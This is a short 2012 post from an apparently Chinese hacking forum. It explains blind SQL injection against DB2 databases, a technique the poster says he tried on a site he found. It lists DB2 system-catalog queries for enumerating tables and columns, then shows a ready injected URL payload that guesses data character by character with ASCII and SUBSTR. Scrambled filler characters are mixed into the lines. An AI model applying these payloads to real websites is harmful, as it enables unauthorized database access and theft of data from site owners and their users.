找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2088|回复: 0
打印 上一主题 下一主题

Sql Injection in DB2数据库

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:06:51 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
; m1 L5 A0 r2 n% B3 k' a3 _参考了IBM DB2的文档,总结了这样几条: 4 {0 T. o  N+ @4 d( w
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
9 n7 H* p5 Q* Q% p可以返回系统中所有用户创建的表(table)名
% I. M7 z6 L/ a" z2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
1 }3 _& V3 M( }0 N" Z返回表中的列名
) S; J* V0 S4 D' x, b" O9 R3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
( ~. L7 o! f# W6 x, I1 g7 n这是最关键的地方,返回第一条记录,类似于sql server中的top 1
, N. I% ^- r1 u* t4、SUBSTR(string, position, length)
# U, ~" m2 c  L) w, s+ ?6 O7 h3 A返回字符串子串的函数,类似于mid 1 z0 }/ }  W9 z* {$ W7 u0 j/ F9 Q
5、ASCII()这个就不用多说了。 , S$ h* Y9 Q- Q- j( K
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
& h* H3 T0 o7 C例如判断第一个table的名称的第一个字符的ascii码是否大于50: # [6 z( d- X' h' k( t- K! f- p
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 -- - Z. J( v  A# [% A3 }& {

' C. C  Y) y/ z0 g/ O6 w3 m2 z+ h  uhttp://blog.waynedeng.com/blogview.asp?logID=543
  q) m6 j5 Z" q% e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表